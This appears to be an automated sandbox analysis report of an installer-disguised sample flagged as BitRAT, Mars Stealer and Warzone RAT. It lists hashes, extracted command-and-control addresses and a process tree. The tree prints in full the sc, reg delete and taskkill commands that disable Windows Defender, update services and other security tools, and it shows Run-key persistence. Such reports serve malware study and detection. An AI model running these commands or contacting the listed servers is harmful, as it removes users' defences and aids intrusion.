bitrat | bccc4ed85a1cca9413814ceaf90a4e12de07e5b0a07963ca6ea0a8b40a926550

Analysis

max time kernel
137s
max time network
156s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
03-01-2023 19:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Installerx64/Installerx64.exe
Size

2.1MB
MD5

592bef1e0325ada505ec4875d5727bc1
SHA1

d6c6aa187d2b5aaff512c12948a426584382e92c
SHA256

83b8c34a7c66b407be941e59a9ce7a84ee81a8dfad3cea67e86118e96221c749
SHA512

38410a737b63a6cf123b08b74e836e75189ce6dae8d4491b4deab5791eff29a824be24d3d70a53ccaf3137222d79253385be5180fffc1e98a0a9c11b1b1e8d3e
SSDEEP

49152:tBUOgQLgF1CiOBInpLNAZpCY3iEO+IVG5r:nU7CCtOmFNAP6O

Score

10^/10

bitrat marsstealer warzonerat default evasion infostealer persistence rat stealer trojan

Malware Config

Extracted

Family

warzonerat

45.139.105.147:5200

Extracted

Family

marsstealer

Botnet

Default

data.topababa.com/gate.php

Extracted

Family

bitrat

Version

1.38

45.139.105.147:1234

Attributes

communication_password
81dc9bdb52d04dc20036dbd8313ed055
install_dir
temp
install_file
svchost
tor_process
tor

Signatures

BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
trojan bitrat
Mars Stealer
An infostealer written in C++ based on other infostealers.
stealer marsstealer

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Parameters	reg.exe

WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat

Warzone RAT payload 5 IoCs

rat

Processes:

resource	yara_rule
\Program Files\Microsoft.exe	warzonerat
\Program Files\Microsoft.exe	warzonerat
\Program Files\Microsoft.exe	warzonerat
\Program Files\Microsoft.exe	warzonerat
C:\Program Files\Microsoft.exe	warzonerat

Executes dropped EXE 12 IoCs

Processes:

Microsoft.exeBuilded.exeinstallerX32.exeInstallerX64.exeMicrosoft office.exedismhost.exedismhost.exedismhost.exedismhost.exedismhost.exedismhost.exedismhost.exe

pid	process
1552	Microsoft.exe
1352	Builded.exe
456	installerX32.exe
1672	InstallerX64.exe
992	Microsoft office.exe
584	dismhost.exe
740	dismhost.exe
1764	dismhost.exe
112	dismhost.exe
1660	dismhost.exe
1520	dismhost.exe
2036	dismhost.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Loads dropped DLL 64 IoCs

Processes:

Installerx64.exeDism.exedismhost.exeDism.exedismhost.exe

pid	process
980	Installerx64.exe
980	Installerx64.exe
980	Installerx64.exe
980	Installerx64.exe
980	Installerx64.exe
980	Installerx64.exe
980	Installerx64.exe
980	Installerx64.exe
980	Installerx64.exe
980	Installerx64.exe
980	Installerx64.exe
980	Installerx64.exe
980	Installerx64.exe
980	Installerx64.exe
980	Installerx64.exe
980	Installerx64.exe
980	Installerx64.exe
980	Installerx64.exe
1016	Dism.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
584	dismhost.exe
1704	Dism.exe
740	dismhost.exe
740	dismhost.exe
740	dismhost.exe
740	dismhost.exe
740	dismhost.exe
740	dismhost.exe
740	dismhost.exe
740	dismhost.exe
740	dismhost.exe
740	dismhost.exe
740	dismhost.exe
740	dismhost.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Microsoft office.exeMicrosoft.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost"	Microsoft office.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program Files\\Microsoft.exe"	Microsoft.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

Microsoft office.exe

pid process

992 Microsoft office.exe
992 Microsoft office.exe
992 Microsoft office.exe
992 Microsoft office.exe

pid	process
992	Microsoft office.exe
992	Microsoft office.exe
992	Microsoft office.exe
992	Microsoft office.exe

Drops file in Program Files directory 57 IoCs

Processes:

Installerx64.execmd.exe

description	ioc	process
File created	C:\Program Files\__tmp_rar_sfx_access_check_7084333	Installerx64.exe
File created	C:\Program Files\installerX32.exe	Installerx64.exe
File opened for modification	C:\Program Files\Microsoft office.exe	Installerx64.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpClient.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpOAV.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpCommu.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\MpAsDesc.dll	cmd.exe
File opened for modification	C:\Program Files\installerX32.exe	Installerx64.exe
File created	C:\Program Files\InstallerX64.exe	Installerx64.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpAsDesc.dll	cmd.exe
File opened for modification	C:\Program Files\Microsoft.exe	Installerx64.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpCmdRun.exe	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\MsMpLics.dll	cmd.exe
File opened for modification	C:\Program Files\InstallerX64.exe	Installerx64.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\MpOAV.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpRTP.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File created	C:\Program Files\Builded.exe	Installerx64.exe
File opened for modification	C:\Program Files\Windows Defender\MpEvMsg.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MsMpCom.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\en-US\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MsMpLics.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\MpClient.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpSvc.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File created	C:\Program Files\Microsoft office.exe	Installerx64.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MSASCui.exe	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MsMpRes.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File created	C:\Program Files\Microsoft.exe	Installerx64.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Builded.exe	Installerx64.exe

Drops file in Windows directory 14 IoCs

Processes:

Dism.exedismhost.exedismhost.exeDism.exedismhost.exedismhost.exedismhost.exedismhost.exeDism.exeDism.exeDism.exeDism.exedismhost.exeDism.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe

Launches sc.exe 50 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
112	sc.exe
1580	sc.exe
584	sc.exe
2000	sc.exe
1628	sc.exe
1960	sc.exe
1112	sc.exe
1412	sc.exe
1424	sc.exe
1080	sc.exe
432	sc.exe
1504	sc.exe
1752	sc.exe
580	sc.exe
988	sc.exe
1564	sc.exe
740	sc.exe
1688	sc.exe
1520	sc.exe
296	sc.exe
1660	sc.exe
1740	sc.exe
1112	sc.exe
2004	sc.exe
940	sc.exe
1056	sc.exe
1404	sc.exe
964	sc.exe
1832	sc.exe
2000	sc.exe
2028	sc.exe
644	sc.exe
1900	sc.exe
664	sc.exe
1292	sc.exe
1612	sc.exe
1740	sc.exe
2036	sc.exe
2008	sc.exe
900	sc.exe
1668	sc.exe
1936	sc.exe
972	sc.exe
2036	sc.exe
568	sc.exe
1668	sc.exe
1040	sc.exe
1380	sc.exe
1384	sc.exe
1764	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 9 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1416	taskkill.exe
1712	taskkill.exe
1580	taskkill.exe
1496	taskkill.exe
1124	taskkill.exe
296	taskkill.exe
812	taskkill.exe
560	taskkill.exe
1548	taskkill.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 26 IoCs

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exesc.exesc.exesc.exetaskkill.exesc.exesc.exesc.exetaskkill.exesc.exesc.exesc.exetaskkill.exe

pid	process
1160	reg.exe
1996	reg.exe
964	reg.exe
1620	reg.exe
1192	reg.exe
1660	reg.exe
1584	reg.exe
860	reg.exe
1512	reg.exe
1912	reg.exe
1984	reg.exe
744	reg.exe
1976	reg.exe
464	reg.exe
1520	sc.exe
1384	sc.exe
1832	sc.exe
1712	taskkill.exe
1740	sc.exe
1112	sc.exe
988	sc.exe
560	taskkill.exe
1764	sc.exe
2036	sc.exe
2008	sc.exe
1548	taskkill.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

Processes:

taskkill.exeMicrosoft office.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeDism.exeDism.exeDism.exeDism.exeDism.exeDism.exe

description	pid	process
Token: SeDebugPrivilege	1580	taskkill.exe
Token: SeDebugPrivilege	992	Microsoft office.exe
Token: SeShutdownPrivilege	992	Microsoft office.exe
Token: SeDebugPrivilege	812	taskkill.exe
Token: SeDebugPrivilege	1496	taskkill.exe
Token: SeDebugPrivilege	1124	taskkill.exe
Token: SeDebugPrivilege	296	taskkill.exe
Token: SeDebugPrivilege	1416	taskkill.exe
Token: SeDebugPrivilege	1712	taskkill.exe
Token: SeDebugPrivilege	560	taskkill.exe
Token: SeDebugPrivilege	1548	taskkill.exe
Token: SeBackupPrivilege	1016	Dism.exe
Token: SeRestorePrivilege	1016	Dism.exe
Token: SeBackupPrivilege	1704	Dism.exe
Token: SeRestorePrivilege	1704	Dism.exe
Token: SeBackupPrivilege	1628	Dism.exe
Token: SeRestorePrivilege	1628	Dism.exe
Token: SeBackupPrivilege	580	Dism.exe
Token: SeRestorePrivilege	580	Dism.exe
Token: SeBackupPrivilege	2044	Dism.exe
Token: SeRestorePrivilege	2044	Dism.exe
Token: SeBackupPrivilege	1116	Dism.exe
Token: SeRestorePrivilege	1116	Dism.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

Microsoft office.exe

pid process

992 Microsoft office.exe
992 Microsoft office.exe

pid	process
992	Microsoft office.exe
992	Microsoft office.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Installerx64.exeinstallerX32.exeInstallerX64.execmd.execmd.exesc.exe

description	pid	process	target process
PID 980 wrote to memory of 1552	980	Installerx64.exe	Microsoft.exe
PID 980 wrote to memory of 1552	980	Installerx64.exe	Microsoft.exe
PID 980 wrote to memory of 1552	980	Installerx64.exe	Microsoft.exe
PID 980 wrote to memory of 1552	980	Installerx64.exe	Microsoft.exe
PID 980 wrote to memory of 1352	980	Installerx64.exe	Builded.exe
PID 980 wrote to memory of 1352	980	Installerx64.exe	Builded.exe
PID 980 wrote to memory of 1352	980	Installerx64.exe	Builded.exe
PID 980 wrote to memory of 1352	980	Installerx64.exe	Builded.exe
PID 980 wrote to memory of 456	980	Installerx64.exe	installerX32.exe
PID 980 wrote to memory of 456	980	Installerx64.exe	installerX32.exe
PID 980 wrote to memory of 456	980	Installerx64.exe	installerX32.exe
PID 980 wrote to memory of 456	980	Installerx64.exe	installerX32.exe
PID 980 wrote to memory of 456	980	Installerx64.exe	installerX32.exe
PID 980 wrote to memory of 456	980	Installerx64.exe	installerX32.exe
PID 980 wrote to memory of 456	980	Installerx64.exe	installerX32.exe
PID 980 wrote to memory of 1672	980	Installerx64.exe	InstallerX64.exe
PID 980 wrote to memory of 1672	980	Installerx64.exe	InstallerX64.exe
PID 980 wrote to memory of 1672	980	Installerx64.exe	InstallerX64.exe
PID 980 wrote to memory of 1672	980	Installerx64.exe	InstallerX64.exe
PID 980 wrote to memory of 1672	980	Installerx64.exe	InstallerX64.exe
PID 980 wrote to memory of 1672	980	Installerx64.exe	InstallerX64.exe
PID 980 wrote to memory of 1672	980	Installerx64.exe	InstallerX64.exe
PID 456 wrote to memory of 2044	456	installerX32.exe	cmd.exe
PID 456 wrote to memory of 2044	456	installerX32.exe	cmd.exe
PID 456 wrote to memory of 2044	456	installerX32.exe	cmd.exe
PID 456 wrote to memory of 2044	456	installerX32.exe	cmd.exe
PID 1672 wrote to memory of 364	1672	InstallerX64.exe	cmd.exe
PID 1672 wrote to memory of 364	1672	InstallerX64.exe	cmd.exe
PID 1672 wrote to memory of 364	1672	InstallerX64.exe	cmd.exe
PID 1672 wrote to memory of 364	1672	InstallerX64.exe	cmd.exe
PID 980 wrote to memory of 992	980	Installerx64.exe	Microsoft office.exe
PID 980 wrote to memory of 992	980	Installerx64.exe	Microsoft office.exe
PID 980 wrote to memory of 992	980	Installerx64.exe	Microsoft office.exe
PID 980 wrote to memory of 992	980	Installerx64.exe	Microsoft office.exe
PID 364 wrote to memory of 1016	364	cmd.exe	Dism.exe
PID 364 wrote to memory of 1016	364	cmd.exe	Dism.exe
PID 364 wrote to memory of 1016	364	cmd.exe	Dism.exe
PID 2044 wrote to memory of 2000	2044	cmd.exe	sc.exe
PID 2044 wrote to memory of 2000	2044	cmd.exe	sc.exe
PID 2044 wrote to memory of 2000	2044	cmd.exe	sc.exe
PID 364 wrote to memory of 2004	364	cmd.exe	sc.exe
PID 364 wrote to memory of 2004	364	cmd.exe	sc.exe
PID 364 wrote to memory of 2004	364	cmd.exe	sc.exe
PID 2004 wrote to memory of 1912	2004	sc.exe	reg.exe
PID 2004 wrote to memory of 1912	2004	sc.exe	reg.exe
PID 2004 wrote to memory of 1912	2004	sc.exe	reg.exe
PID 2044 wrote to memory of 1740	2044	cmd.exe	sc.exe
PID 2044 wrote to memory of 1740	2044	cmd.exe	sc.exe
PID 2044 wrote to memory of 1740	2044	cmd.exe	sc.exe
PID 364 wrote to memory of 1604	364	cmd.exe	reg.exe
PID 364 wrote to memory of 1604	364	cmd.exe	reg.exe
PID 364 wrote to memory of 1604	364	cmd.exe	reg.exe
PID 364 wrote to memory of 1296	364	cmd.exe	reg.exe
PID 364 wrote to memory of 1296	364	cmd.exe	reg.exe
PID 364 wrote to memory of 1296	364	cmd.exe	reg.exe
PID 364 wrote to memory of 1460	364	cmd.exe	reg.exe
PID 364 wrote to memory of 1460	364	cmd.exe	reg.exe
PID 364 wrote to memory of 1460	364	cmd.exe	reg.exe
PID 364 wrote to memory of 1648	364	cmd.exe	reg.exe
PID 364 wrote to memory of 1648	364	cmd.exe	reg.exe
PID 364 wrote to memory of 1648	364	cmd.exe	reg.exe
PID 364 wrote to memory of 744	364	cmd.exe	reg.exe
PID 364 wrote to memory of 744	364	cmd.exe	reg.exe
PID 364 wrote to memory of 744	364	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe
"C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx64.exe"
1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:980

C:\Program Files\Microsoft.exe
"C:\Program Files\Microsoft.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1552

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
3⤵
PID:1436

C:\Program Files\Builded.exe
"C:\Program Files\Builded.exe"
2⤵
- Executes dropped EXE
PID:1352

C:\Program Files\installerX32.exe
"C:\Program Files\installerX32.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:456

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1BBC.tmp\1BBD.tmp\1BBE.bat "C:\Program Files\installerX32.exe""
3⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2044

C:\Windows\system32\sc.exe
sc stop windefend
4⤵
- Launches sc.exe
PID:2000

C:\Windows\system32\sc.exe
sc config windefend start= disabled
4⤵
- Launches sc.exe
PID:1740

C:\Windows\system32\sc.exe
sc delete windefend
4⤵
- Launches sc.exe
PID:1112

C:\Windows\system32\sc.exe
sc config WdNisSvc start= disabled
4⤵
- Launches sc.exe
PID:2028

C:\Windows\system32\sc.exe
sc delete WdNisSvc
4⤵
- Launches sc.exe
PID:1080

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:1040

C:\Windows\system32\sc.exe
sc delete Sense
4⤵
- Launches sc.exe
PID:644

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
4⤵
- Launches sc.exe
PID:1580

C:\Windows\system32\sc.exe
sc config Sense start= disabled
4⤵
- Launches sc.exe
PID:900

C:\Windows\system32\sc.exe
sc stop Sense
4⤵
- Launches sc.exe
PID:1668

C:\Windows\system32\sc.exe
sc stop WdNisSvc
4⤵
- Launches sc.exe
PID:584

C:\Windows\system32\sc.exe
sc stop usosvc
4⤵
- Launches sc.exe
PID:2000

C:\Windows\system32\sc.exe
sc config usosvc start= disabled
4⤵
- Launches sc.exe
- Suspicious use of WriteProcessMemory
PID:2004

C:\Windows\system32\sc.exe
sc stop WaasMedicSvc
4⤵
- Launches sc.exe
PID:1936

C:\Windows\system32\sc.exe
sc config WaasMedicSvc start= disabled
4⤵
- Launches sc.exe
PID:940

C:\Windows\system32\sc.exe
sc stop SecurityHealthService
4⤵
- Launches sc.exe
PID:972

C:\Windows\system32\sc.exe
sc config SecurityHealthService start= disabled
4⤵
- Launches sc.exe
PID:1056

C:\Windows\system32\sc.exe
sc delete SecurityHealthService
4⤵
- Launches sc.exe
PID:1564

C:\Windows\system32\sc.exe
sc stop SDRSVC
4⤵
- Launches sc.exe
PID:432

C:\Windows\system32\sc.exe
sc config SDRSVC start= disabled
4⤵
- Launches sc.exe
PID:740

C:\Windows\system32\sc.exe
sc stop wscsvc
4⤵
- Launches sc.exe
PID:1504

C:\Windows\system32\sc.exe
sc config wscsvc start= disabled
4⤵
- Launches sc.exe
PID:1628

C:\Windows\system32\sc.exe
sc stop WdiServiceHost
4⤵
- Launches sc.exe
PID:1404

C:\Windows\system32\sc.exe
sc config WdiServiceHost start= disabled
4⤵
- Launches sc.exe
PID:1900

C:\Windows\system32\sc.exe
sc stop WdiSystemHost
4⤵
- Launches sc.exe
PID:664

C:\Windows\system32\sc.exe
sc config WdiSystemHost start= disabled
4⤵
- Launches sc.exe
PID:1688

C:\Windows\system32\sc.exe
sc stop InstallService
4⤵
- Launches sc.exe
PID:2036

C:\Windows\system32\sc.exe
sc config InstallService Start= disabled
4⤵
- Launches sc.exe
PID:1292

C:\Windows\system32\sc.exe
sc stop VaultSvc
4⤵
- Launches sc.exe
PID:568

C:\Windows\system32\sc.exe
sc config VaultSvc start= disabled
4⤵
- Launches sc.exe
PID:1668

C:\Windows\system32\sc.exe
sc stop Spooler
4⤵
- Launches sc.exe
PID:1752

C:\Windows\system32\sc.exe
sc config Spooler start= disabled
4⤵
- Launches sc.exe
PID:1960

C:\Windows\system32\sc.exe
sc stop LicenseManager
4⤵
- Launches sc.exe
PID:964

C:\Windows\system32\sc.exe
sc config LicenseManager start= disabled
4⤵
- Launches sc.exe
PID:1612

C:\Windows\system32\sc.exe
sc stop DiagTrack
4⤵
- Launches sc.exe
PID:1660

C:\Windows\system32\sc.exe
sc config DiagTrack start= disabled
4⤵
- Launches sc.exe
PID:1380

C:\Windows\system32\taskkill.exe
taskkill /f /im smartscreen.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1580

C:\Windows\system32\taskkill.exe
taskkill /f /im SecurityHealthService.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:812

C:\Windows\system32\taskkill.exe
taskkill /f /im MpCopyAccelerator.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1496

C:\Windows\system32\taskkill.exe
taskkill /f /im MpCopyAccelerator.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1124

C:\Windows\System32\taskkill.exe
taskkill /f /im SecurityHealthService.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:296

C:\Windows\system32\taskkill.exe
taskkill /f /im SystemSettings.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1416

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1160

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center" /f
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1996

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /f
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:964

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /f
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1620

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection" /f
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1192

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Security Health" /f
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1660

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows Defender" /f
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1584

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Defender" /f
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:860

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdBoot" /f
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1512

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdFilter" /f
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1912

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisDrv" /f
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1984

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc" /f
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:744

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /f
4⤵
- Modifies security service
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1976

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v SecurityHealth /f
4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:464

C:\Windows\SysWOW64\sc.exe
sc delete windefend
4⤵
- Launches sc.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1520

C:\Windows\SysWOW64\sc.exe
sc delete sense
4⤵
- Launches sc.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1384

C:\Windows\SysWOW64\sc.exe
sc stop nsWscSvc
4⤵
- Launches sc.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1832

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im MBAMWsc.exe
4⤵
- Kills process with taskkill
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:1712

C:\Windows\SysWOW64\sc.exe
sc stop MBAMService
4⤵
- Launches sc.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1740

C:\Windows\SysWOW64\sc.exe
sc config MBAMService start= disabled
4⤵
- Launches sc.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1112

C:\Windows\SysWOW64\sc.exe
sc delete MBAMService
4⤵
- Launches sc.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:988

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im MBAM.exe
4⤵
